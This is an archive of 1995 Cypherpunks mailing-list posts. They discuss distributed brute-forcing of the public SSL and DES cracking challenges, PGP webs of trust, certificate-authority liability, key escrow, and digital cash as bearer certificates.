increase the reservoir by a factor of 1000, which isn't at all unlikely,
that advance would be nothing to sneeze at.
        Cracking something that for now seems beyond reach would up the
ante in a pretty big way, and would put that much more pressure on
policymakers to jack that bit-limit up. And that's exactly what we want.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Tue, 22 Aug 95 09:27:02 PDT
To: cypherpunks@toad.com
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <v02120d00ac5f122a84c7@[166.84.253.144]>
Message-ID: <199508221626.JAA10063@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain



[stuff about running crypto screensavers]

It seems like there's got to be an easy way to divvy up keyspace on a
real time basis so that anyone with a few cycles to spare can
contribute them...

There could be a central server out there, which would keep track of
what keyspace needs to be swept, etc.

Then, clients (available as Mac, DOS, Windows*, UNIX,
etc. screensavers) could, whenever possible, connect to the server,
get a bit of keyspace, and start checking.

The client would tell the server how fast it is (chip and speed), and,
optionally, an estimation of how much time it will have free.  The
server finds some unchecked keyspace and allocates the range.  Then,
when the screensaver ends (when the user starts working again), it
would check in and tell the server how much of the space it checked.

The server could implement multiple passes of the keyspace to cope
with untrusted clients, etc.

Or something like that, anyhow.

The point is, the keyspace should be divided on a spare-cycle basis,
so that people who happen to have some extra, unused time on a
workstation can help without having to follow this list religiously,
and without having to commit to checking a certain amount of keyspace
beforehand.

This really is a nifty concept, and I think a *lot* of people would be
interested in running crypto-cracking screensavers.

--sq




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 22 Aug 95 09:31:26 PDT
To: cypherpunks@toad.com
Subject: Any code for getting noise from PC & Mac sound card?
Message-ID: <9507228091.AA809109019@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        I am looking for an example of software that extracts unpredictable
bits from the sound cards of PCs and MACs.  Has anyone written software
like this?  Can someone send me a URL to it?  Thanks,
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 22 Aug 95 09:18:43 PDT
To: patl@lcs.mit.edu
Subject: Re: True Names and Webs of Trust
Message-ID: <ac5f51e317021004ef44@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:46 PM 8/22/95, Patrick J. LoPresti wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
> tcmay> As Bill Stewart correctly claimed is my view, the "key is the
> tcmay> identity."  Or, more accurately, a _persistent personna_ is
> tcmay> what matters.
>
>These discussions are missing the entire point of the Web of Trust.
>
>Key signatures exist for one reason and one reason only: To thwart
>man-in-the-middle attacks.  Whether your "persistent persona" is a
>True Name (tm) or a pseudonym is irrelevant.

But this is exactly what a persistent personna is. Not a True Name, but a
keyholder who has not been spoofed by some other agent or entity.

End to end.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 22 Aug 95 07:12:08 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508220140.TAA12229@nagina.cs.colorado.edu>
Message-ID: <199508221411.KAA00910@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "wilcoxb" == Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:

 >> Yes, I've been remiss.  It's an old belief -- that signing is
 >> expensive.  Now that I'm using emacs extensions and RMAIL, it's
 >> really easy -- but I still follow the old habit.

 wilcoxb> I have a pretty easy-to-use set-up...

Probably not as easy as Carl's.

 wilcoxb> Not to seem picky or anything, but now that I have a
 wilcoxb> clearsigned message from you, I need your public key in
 wilcoxb> order to verify it.  :-)

Assuming Carl is using Mailcrypt under Emacs (as he suggests above),
then he doesn't have the same problem.  When the signature fails to
verify for lack of a key, Mailcrypt will parse the PGP output and
offer to fetch the needed key automatically (and instantly) via HTTP
to the keyservers.

But then, Emacs only runs on "ghettoized" operating systems like Unix,
VMS, OS/2, and Windows 95...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMDnljnr7ES8bepftAQEFLwP/b9TE5QphAhJl1PyhdAsbyE3Vx58TuwGD
dAJf2fpThN9wYgQ3b0K+QxYbLVcQTbof5v8/AvYyM32JrsEzRQXZmjguoOT0BnLz
gjxTS5qLhOmcOhbUc6G3iEPQTuusWU59PPqp1TYPkZ0zVopDvPjay2O60whl4t/a
bARjHknf+es=
=bAX+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 21 Aug 95 17:27:59 PDT
To: cypherpunks@toad.com
Subject: Doing the SSL challenge
Message-ID: <Pine.SOL.3.91.950822091322.17350B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Boy, go away for a weeks holidays and every-one else has all the fun :-).

Just a few quick ramble about my searching of the top half of the key 
space in the first SSL challenge, please ignore if you are sick of this 
thread.

All these estimates of the cost in CPU time are a bit silly.  I started 
out using a few of our bigger machines at work but when people noticed I 
just stoped using them.  My main workhorse machines 
became desktop boxes that nobody used at night.  Quite a bit of my 
%50 keyspace was done by 5 dual processor sparc 20's that people around 
me had on their desktops.  Most of the rest was done by about 50 486's 
that I rsh'ed to each night (I just tried to rsh to every Solaris/x86 box 
in the company :-).  Out of a company of about 300 people, about 
2 (who did not know about my attempt on the challenge) asked me about this 
processing and what was I actually doing, no-one else really noticed :-).

I was making no particular effort to use every machine I could but I was 
still able to do about %2.5 of the key space each 12 hour night and %12.5 
each weekend.  If I made a real effort to harness the compute power at my 
work I would have probably been able to run at twice this rate but that 
would have required work on my part, alot more people would have noticed 
and it would have had an impact on people doing real work.  The way I was 
seaching had no impact.

I will also say that screen-savers running on the above mentioned 486's 
were a real pain, perhaps we will change xlock so they can only run the 
blank screen :-).

I personally feel that using mas-pars is cheating a bit :-).  People are 
aware that something is going on when a machine that big is grunting away 
all weekend :-).  There is so much CPU sitting on people's desktops that 
is just unused that there is very little need to use the big central boxes.

The relative speed on some of the machines I used is as follows (per CPU 
is in brackets)
6 CPU SGI challenge	37 (6.1)  5 (1.6)
2 CPU sparc 20		7  (3.5)  1 
1 CPU 486 DX50		1

I could never realy get more that 1/2 the SGI 
but I could always get 5 sparc 20's and 50+ 486's without anyone noticing.
So I was getting the 2.5 6CPU SGI challenge's from idle machines on 
people desks.

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups that the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 22 Aug 95 10:00:16 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <ac5f582e1902100469ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:01 PM 8/22/95, Robert Hettinga wrote:

>Obviously, we aren't talking about the end of bookeeping as we know it
>(BAWKI? ;-), but it does mean that days of book-entry as a means of social
>control are numbered.

A good essay. Too long for me to quote and discuss, though.

I worry about our--or at least my, speaking for myself--terminology.
Consider these variations on the same theme:

cash <--> immediate clearing <--> tokens <--> certificates

vs.

checks <--> delayed clearing <--> account-based systems


(I'm using "<-->" as my own symbol to mean "related to.")

Chaum has been harping on this exact distinction in public talks. I at
first thought he was beating a dead horse, but I now see that most people
just don't get it. (I don't mean people on our list, I mean journalists and
writers about "digital money.")

Marvin Minsky once said the history of AI is the history of grad students
and researchers giving new names to old ideas. (Ironically, Minsky did this
in spades when he took the ideas of "object-oriented programming" and
invented the term "frame-based systems" to cover the same ground!)

One hope I have for the "class library" approach, whether implemented in
C++, Java, Smalltalk, etc., is that these terms and concepts will be
reified in code, with browsable definitions and examples.

The "financial instruments" people have been working on this "ontology of
money" for a long time. I have long been surprised that the crypto and
financial communities have little overlap.

No, I don't mean you folks are not bridging both worlds. And I don't mean
the banking and finance industry is not working on incorporating more
crypto. I mean that the "Crypto" conferences have very little stuff being
published on finance and money, save for the Chaum stuff.

The interesting stuff for me lies in the intersection of:

Crypto + Game Theory + Economics


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 21 Aug 95 17:51:03 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape security
In-Reply-To: <9508211902.AA19391@couchey.inria.fr>
Message-ID: <Pine.SOL.3.91.950822102640.19364A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Damien Doligez wrote:
> >From: altitude@cic.net (Alex Tang)
> >It seems that one of the problems with Damien's
> >cracking job was that it  was "not sanctioned".
>
> Actually, INRIA's PR people are quite pleased with the publicity.
> They asked me to prepare an official press release to counteract the
> Wall Street Journal's "evil hacker" story, which was unfortunately
> reprinted by some papers.  The Herald Tribune is particularly bad in
> this respect.

Yes, this is all quite silly.  For my part, I've implemented SSL on my 
work machines (in my own time) and released it under my own copyright
and my boses don't mind (mind you, I'm not trying to make money from the 
code).  I've participated in trying to break the 40bit 
key on work machines (using only idle machines) and they don't mind.  
I've run network raytracing programs (using only idle machines) and they 
don't mind.  Most places of work give employees quite a bit of lattitude 
as long as they don't do things that reflect badly on the company and if it 
generates publicity that is positive they don't mind.  If Joe Bloggs who 
works at Widgets Inc get's mentioned in the paper, thats free publicity 
for Widgets Inc and indicates that Widgets Inc may have some-one with 
some brain cells working for them (depending if they call Joe Bloggs an 
'evil hacker' or not :-).

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups that the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 22 Aug 95 10:13:14 PDT
To: cypherpunks@toad.com
Subject: Re: True Names and Webs of Trust
Message-ID: <ac5f5e401b021004d6d0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:38 PM 8/22/95, Rich Salz wrote:
>> This has relevance to the thread Michael Froomkin raised, as well. To wit,
>> none of the people I've met has been "certified." And yet it doesn't bother
>> me.
>
>Just because you haven't been able to easily do it yet, nor found it useful,
>is no reason not to let new technology provide this service to you.

I wasn't saying I wouldn't let new technology provide this service for me.

I was just saying that lack of it has not been a problem, so far. In very
few of my dealings, even in the economic world, have I needed to have any
kind of certification.

(Buying a new house recently is where I needed certification of inspectors,
escrow agents, title companies, etc.)

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 22 Aug 95 07:47:03 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: True Names and Webs of Trust
In-Reply-To: <ac5ebdaa140210041c80@[205.199.118.202]>
Message-ID: <199508221446.KAA00931@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 tcmay> As Bill Stewart correctly claimed is my view, the "key is the
 tcmay> identity."  Or, more accurately, a _persistent personna_ is
 tcmay> what matters.

These discussions are missing the entire point of the Web of Trust.

Key signatures exist for one reason and one reason only: To thwart
man-in-the-middle attacks.  Whether your "persistent persona" is a
True Name (tm) or a pseudonym is irrelevant.

Suppose a sysadmin on your site installed a filter on your mail and
news that translated everything between your real public key and one
of her choosing.  Such a transformation could be done automatically
quite easily.  How long before you would notice?  Depending on how
careful you are, it could take quite a while.

Key signatures avoid this attack.  What a key signature *means* is
that the signer is personally vouching that no such attack has taken
place.  Each signer has his own level of paranoia, and you need some
knowledge of that paranoia level to evaluate the worth of a signature.

Requiring a True Name backed by state-appoved photo ID is a pretty
high level of paranoia.  (It would take a lot of effort to monitor
this exchange, edit it to arrange a meeting between us, show up with
photo ID for "Tim May", and continue editing every time one of us
mentioned our personal meeting...)

Pseudonyms *do* pose a problem here.  The problem is not whether
someone tries to use a name that "really" belongs to someone else.
Who cares?  The problem is making sure that your conversation with the
entity at the other end of the wire is secure.

This is what the Web of Trust provides.  If I take the time to have a
long conversation with a pseudonym (so that I "get to know him"), then
I arrange a personal or telephone meeting, and the person I talk to is
totally consistent with the person I know electronically, then I can
feel safe signing his key.  ("The entity calling itself 'Patrick J.
LoPresti' asserts that the entity it knows as 'John Doe' uses this
public key.") Of course, I need to know him pretty well before I can
do this, lest the man-in-the-middle deceive us.  The beauty of the Web
of Trust is that once I have done this, everyone else who trusts me
can use the pseudo's key with confidence and without going through the
same trouble.

Zimmermann clearly understood all of this, but I don't think he
documented it properly.  In my opinion, everyone should always think
in terms of man-in-the-middle attacks when signing a public key.
Mandating "True Names" is just an overconservative approach suitable
for people who don't fully understand the issue.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMDntwHr7ES8bepftAQFyyAQAnFtDh4UxHOtFoykCFVyK4s0CXqXhku+k
T8n/881R0F1lL+qKMlkxCd0qRmYXueeYGCO6oXAMWgVjVBQ4PluAdw7Ad4b9GxDA
FzkuN5oasKbyKyyCRguRq7DszKWW0nyjGbsToq0udtX0fsY33ZtU3btbsjawBFgI
Kk7TEeHBT+8=
=pndj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle Seaman <lws+@transarc.com>
Date: Tue, 22 Aug 95 08:19:01 PDT
To: cypherpunks@toad.com
Subject: Re: Partial Key Escrow
In-Reply-To: <Pine.PMDF.3.91.950821214634.620943633A-100000@umiami.ir.miami.edu>
Message-ID: <kkCSvLKSMUw8M93fZt@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin <mfroomki@umiami.ir.miami.edu> writes:
> A disadvantage of this ingenious proposal is that it makes it
> even more difficult to spot rogue key-cracking efforts.  If you are an
> honest government employee and you come across a key cracking program
> today, and you work for a domestic TLA you know something funny is going
> on.  "Just routine" will be line henceforth...

Yeah, but that _doesn't matter_.
The domestic TLA can't afford to embark on massive, wholesale fixing
expeditions this way, even _with_ the escrowed part.  The point is to
fix the unescrowed part at such a size that they can afford to crack a
limited number of keys in a reasonable interval.  Say, at a cost of
about $10000 / key.  That's peanuts for an OKBomb or WTC bomb case,
but it gets to be expensive (hard to hide the expense) if you're
fishing for dirt on members of the opposition party, or investigating
14 year-old Black Panthers.

It also suggests some interesting (and admittedly, abusable) TV shows.
"type this number into your ``America's Most Wanted'' official Screen
Saver key finder..."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Tue, 22 Aug 95 20:15:27 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508220238.TAA22713@ix5.ix.netcom.com>
Message-ID: <Pine.PMDF.3.91.950822111352.623139004A-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Bill Stewart wrote:

> can be substantial even if the suit is bogus.)  Under what conditions do
> you expect somebody to sue a CA?

CA certifies key saying that holder has corporate power to enter into 
deals upto $1million.  Keyholder commits fraud, arguably outside 
corparate powers.

CA certifies you are Jack Ripper based on phony id.  In fact you are Sam 
Spade.  CA sued for recovery of ensuing fraud.

CA certifies that a document is authentic and time-stamps it.  Lawyers 
did not do due dilligence, books were cooked, everyone who touches 
document gets sued.

In each of these cases, if the CA did exactly what it promises and no 
more, it (arguably) deserves a way to short-circuit the suit, thus 
keeping its costs down.

Since (in the absence of any rules given the newness of the technology) it
is very likely that a rich CA would get nuisance suits every time a deal
in which it particiapted went sour, the absence of rules will either 
raise costs CAs have to charge (e.g. to buy insurance) or will keep rich 
folk out of the industry (which isn't good either, since you want CAs to 
buy security and to last).  Thus the need for clear liability rules.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Wed, 23 Aug 95 11:50:14 PDT
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508220238.TAA22713@ix5.ix.netcom.com>
Message-ID: <199508231824.LAA24781@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Bill Stewart wrote:

> can be substantial even if the suit is bogus.)  Under what conditions do
> you expect somebody to sue a CA?

CA certifies key saying that holder has corporate power to enter into 
deals upto $1million.  Keyholder commits fraud, arguably outside 
corparate powers.

CA certifies you are Jack Ripper based on phony id.  In fact you are Sam 
Spade.  CA sued for recovery of ensuing fraud.

CA certifies that a document is authentic and time-stamps it.  Lawyers 
did not do due dilligence, books were cooked, everyone who touches 
document gets sued.

In each of these cases, if the CA did exactly what it promises and no 
more, it (arguably) deserves a way to short-circuit the suit, thus 
keeping its costs down.

Since (in the absence of any rules given the newness of the technology) it
is very likely that a rich CA would get nuisance suits every time a deal
in which it particiapted went sour, the absence of rules will either 
raise costs CAs have to charge (e.g. to buy insurance) or will keep rich 
folk out of the industry (which isn't good either, since you want CAs to 
buy security and to last).  Thus the need for clear liability rules.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 22 Aug 95 09:02:00 PDT
To: cypherpunks@toad.com
Subject: e$: The Book-Entry/Certificate Distinction
Message-ID: <v02120d04ac5f7d30410f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:30 AM 8/22/95, Timothy C. May wrote:
> (An important point is that
>in a cash economy, identity is almost irrelevant. It's only in non-cash, or
>"account-based," economy that True Names are demanded. Lots of interesting
>issues to discuss here, which I won't now.)

I'd like to vamp on this for a while.

I think Tim's talking about what I call the book-entry/certificate
distinction.  It goes right to the heart of finance, and it's why I think
that the strong crypto/Moore's law combination is going to do more to free
people than any political system ever could.  (How's that for a wind-up to
a rant?)

Accounting, well, double-entry bookeeping anyway, was invented in the late
middle ages so people could measure their financial progress, but most
importantly, so that people could trust other people doing the measurement
for them: their bookeepers.  This allowed the Renaissance entrepreneur (or
more orignally an Italian nobleman, who was more of a gangster than
anything else) to delegate financial measurement and consequently build a
much larger enterprise than he could have otherwise.

Before double-entry bookeeping, the first book-entry system, everything was
done on a cash, or certificate, basis, and, like the apocryphal Silicon
Valley entrepreneur's bedroom shoebox, you knew you were making money when
there was more in the till today than there was yesterday. The first
certificates were actually the first form of writing: the original
Cuneiform(sp?) of the Babylonians actually evolved from little pieces of
clay formed into interesting three-dimensional polygons with a signature
seal stamped on them, certificates, or abstractions of value, like "3 cows,
so says I, J. Nebbuchenezzar", these were, in turn, used like money.

Book-entry allowed the creation of larger and larger enterprises, and it's
no surprise that a hundred years or so after the invention of double entry
bookeeping, joint stock companies, and eventually limited liability, came
into being.  The paradox here was that this was an enherently
certificate-based system. People met in front of a buttonwood tree on Wall
Street, and traded ornately engraved certificates representing some
fractional amount of a company's shares or debt outstanding. To trade your
shares, you had to physically send them to Wall Street to have them traded
for you.

Eventually book-entry systems got into the trading of securities when stock
exchanges were founded. Specialists or market-makers would take your order,
and cross them on their books with their own inventory or with people on
the other side of the trade, or, in the commodities markets where the trade
volume is much higher, people stand around a pit, execute the trade with a
contra party, and sign each other's orders.

This was compounded enormously by the advent of faster communications,
particularly telecommunications.  People could trade their stock from
anywhere by wire, or by physically talking to a branch office of a
securities firm who was itself linked by wire to an exchange through its
main office.

In the early days of book-entry trading, delivery of physical certificates
was done at various traders' operations departments, called "cages" for
obvious reasons, to settle a trade.  After a while clearing houses were
instituted to do book-entry settlement of exchange-traded securities. In
fact, when someone says  "book-entry" these days, they usually mean
book-entry securities settlement.  A clearing house has all the physical
certificates in a vault, and keeps books as pointers to all that paper to
show who owns what. Those books match the books of the various traders, and
through the miracle of double-entry bookeeping, everything balances so
everyone agrees with each other.  In fact, the need for all those
certificates sort of goes away in this system, and when I first got on this
list a year or so ago, Perry and I talked about the existence, at the
Depository Trust Company -- the New York Stock Exchange's clearinghouse --
of a single certificate representing a company's entire common stock.

Okay, so what does this have to do with strong crypto? A lot. Every once in
a while I've compared strong crypto and privacy to flight. Flying is an
inherent good for lots of people, but what makes it really economically
useful is how fast you go when you fly.  People buy airline tickets because
they can get anywhere much quicker if they fly than if they do anything
else.  The same with strong cryptography. Privacy, and the strong
cryptography which makes it possible, is an enherent good for most of us,
especially here on *this* list.  But cryptographically strong protocols
become economically useful when used for the creation of certificates which
abstract value: digital bearer certificates like digital cash, and
eventually digital certificates representing stocks, bonds, and various
derivative securities.

To understand why, we need to make one further digression. Remember all
those telecommunications lines going into the exchanges?  The inherent
geometry of a system where lines are cheaper than nodes is a hierarchy: you
pick up a phone to call someone, and your central office routes you up to
its central office, and further on up the hierarchy until the call can be
switched back down somewhere to complete the call. The interesting
correlation between this "switching" and most of our current social
structure can be left for another list, but the reason for this methodology
is all bound up in the economics of wires and switches: at first, wires
were cheaper than switches, who, in the beginning, were people.  We all
know the story from there, people were first replaced with electomechanical
switches, then with solid-state switches, then with microprocessing
switches. When we got microprocessors, the economics of the nodes/lines
problem got turned on its head. We run into Moore's Law.

Moore's Law, for Moore of Intel, is an observation that the price of a
given semiconductor falls by half every 12 months, though it was 18 months
when Moore figured this out.  From a cryptological prospective, we
understand what this means to the future cost of breaking a keyspace of a
certain size.  Moore's Law also means just as much to the structure of the
network: in collapsing the cost of a network's nodes, it converts it from a
hierarchy to a geodesic. Like Bucky Fuller's geodesic domes, a geodesic
network consists of nodes connected to an arbitrary number of lines, with
no real directionality to the motion of traffic: there is no up or down
like in a hierarchy. A message could originate at the node, or could be
just passing through in any direction to any other line the node is
connected to.  A good example of this is a company's PBX, which allowed
intra-company switching of phone calls for large organizations over long
distances directly, without going up and down the telephonic heirarchy.
The abolition of monopoly in the telephone system was primarily caused by
the advent of the geodesic network, and the phrase "Geodesic Network" was
the title of Peter Huber's analysis of the phone system for Judge Green,
the judge who broke up the Bell System in the early 80's.  Huber's
reccommendation to Green in 1986 as was to allow competition in the
Regional Bell Operating Companies' core markets: the local loop.  They're
just getting around to doing it almost 10 years later. Another consequence
of hierarchy, right?

Once again, the social consequences of geodesic information networks are
interesting; ubiquitious computing, telecommuting, flattening organization
structures, and lots of other phenomena can be attributed here, and even
Mr. Archer's transaction-based tax proposal can. However, let's look at
what it does to book-entry, particularly in the presence of strongly
cryptographic certificate systems.

First, like Tim says, a book-entry system is bad for privacy.  The IRS
knows how much money you make, the bank knows how much you spend on your
credit card, another book-entry system, even your grocery store knows what
kind of food your cat likes. In a certificate system, like digital cash, no
one knows anything, and it's cheaper that way anyway. Who did what to whom
and for how much has no economic value whatever. No one can track the
origin of all the bits of cash going through the till, much less audit it's
ownership trail, and cryptographic protocols allow the secure handling of
the money anyway, so the existence of the money speaks for itself, without
needing to know who gave it to you.  Book-entry stays where it belongs, on
the store's accounting system, and there's reason to believe that as
processors get cheaper and cheaper, there might be a micro economy
(ecology?) in the making in an enterprise's various economic units, as a
result of ubiquitous computing. Transfer payments have always been a vexing
problem in large businesses, because there's no way to arrive at a fair
price for intra-company trades of goods and services without looking to
some outside market price.  In fact, it's safe to say that the current
paradigm for financial analysis, the efficient market hypothesis and it's
offspring, CAPM, Black-Scholes, etc., is a solution to the transfer pricing
problem which evolved into something infinitely more useful.

But let's take this idea of strong cryptography in a geodesic network to
another financial abstraction, the securities markets. What you get then is
a reversion to certificate based trading. You've gone back to the
Buttonwood tree, only you're now trading digital certificates on the net.
People announce their intention to trade, what they're willing to pay or
accept, and, when the trade is made, people trade certificates under a
strong cryptographic protocol, announce the price to the market, and walk
away.  People can "make markets" in securities by holding inventories and
simply posting their prices bid or asked, to buy or sell their inventory of
securities.  Notice I said people here.  What we're talking about is
behavior which was originally done by *people* with *certificates*, and
then by ever-larger *institutions* with *book-entry*.  That is, until the
advent of computers, when the pendelum swung back toward smaller entities.
After all, in 1972, anyone with the money could get a Quotron or a NASDAQ
Level 3 machine, and soon, at least the sell side of the market was
competitive again. The stodgy old firms like Morgan Stanley and Salomon had
to turn into very efficient carnivores to survive.  Paradoxically, the buy
side of the market, composed of banks, pensions, and mutual funds, had its
development arrested by regulation and is just approaching the centralizing
phase.  However, we now know that the operation of both the buy and sell
sides of the capital markets are going to get very interesting very soon,
right?

With a geodesic, certificate-based financial system, the economies of scale
caused by hierarchical communications systems go out the window. There is
no need to concentrating processing power to be used to used on the
market's information, because the information is everywhere without having
to concentrate it.  What's more, the specialization of processing enabled
by Moore's Law creates such a flood of information that no centralized
entity can process it all, and so it collapses under its own weight.

Everyone trusts their transactions because of the difficulty of forging
certificates.  That means that once again, a certificate has it's own
inherent worth. It speaks for itself, and when it changes hands, the trade
is, as Eric Hughes says, "immediately and finally" cleared and settled.
The overhead of keeping books is gone, at least for the trading parties,
and especially for the clearing houses, who, like exchanges, just kind of
disappear, along with any way to regulate them.  Somewhere, Joe Kennedy,
the first Chairman of the Securities and Exchange Comission, is probably
either crying his eyes out or laughing his head off, depending on your
interpretation of his role in regulatory history.

This brings us to the reason securities exist, anyway.  A stock certificate
is really a legal document, right?  How can you enforce laws in a geodesic
environment protected by strong cryptography. Well, in a geodesic market,
cryptographic protocols, instead of laws, enforce agreements.  If the
cryptographic protocol isn't satisfied, the software won't work.  It's easy
to see how a combination of certification technology and cryptographically
anonymous voting protocols allow the direct election of a company's board
members without proxies -- another hierarchical device -- for instance.
It's easy to see how the presentation of digital interest coupons to a
company's bond trustee could result in a payment in digital cash.  This
seems to work for just about any kind of financial instrument you could
imagine.  The presence of the digital certificate is prima facie claim upon
the abstracted item, votes, interest/dividends, hog bellies, you name it,
and the protocol could be put into software everyone could check
themselves.

Obviously, we aren't talking about the end of bookeeping as we know it
(BAWKI? ;-), but it does mean that days of book-entry as a means of social
control are numbered.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 22 Aug 95 09:39:04 PDT
To: cypherpunks@toad.com
Subject: Re: True Names and Webs of Trust
Message-ID: <9508221638.AA26842@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> This has relevance to the thread Michael Froomkin raised, as well. To wit,
> none of the people I've met has been "certified." And yet it doesn't bother
> me.

Just because you haven't been able to easily do it yet, nor found it useful,
is no reason not to let new technology provide this service to you.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 22 Aug 95 12:38:06 PDT
To: ecm@ai.mit.edu
Subject: Re: C$ prize for bruting Hal's next challenge?
Message-ID: <v02120d0cac5ff051dc4e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:50 8/22/95, aba@atlas.ex.ac.uk wrote:

>I hereby donate c$ 50 to the pot, mail me your c$.  (It won't be a
>good idea if you post your c$ to the lists, as the first person to
>cash it gets it, you need to do it in private email, PGP it even).  To
>generate your payment either save it to a file, or email directly to
>me via the digicash client, click on the icon which looks like a note
>(is that what it's supposed to be? the one next to the bank symbol),
>then choose to send via file / email toggle make payment, enter the
>amount (leave the shop account ID blank, give a payment description if
>you like).

I like the idea, but there are two problems with it:
-Not all platfoms let you save e$ to a file. You got to open a shop.
-Leaving the shop ID blank won't work. You got to use @ (wildcard) for shop
ID to turn e$ into a bearer certificate.

Get the shop going and I'll donate e$50


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






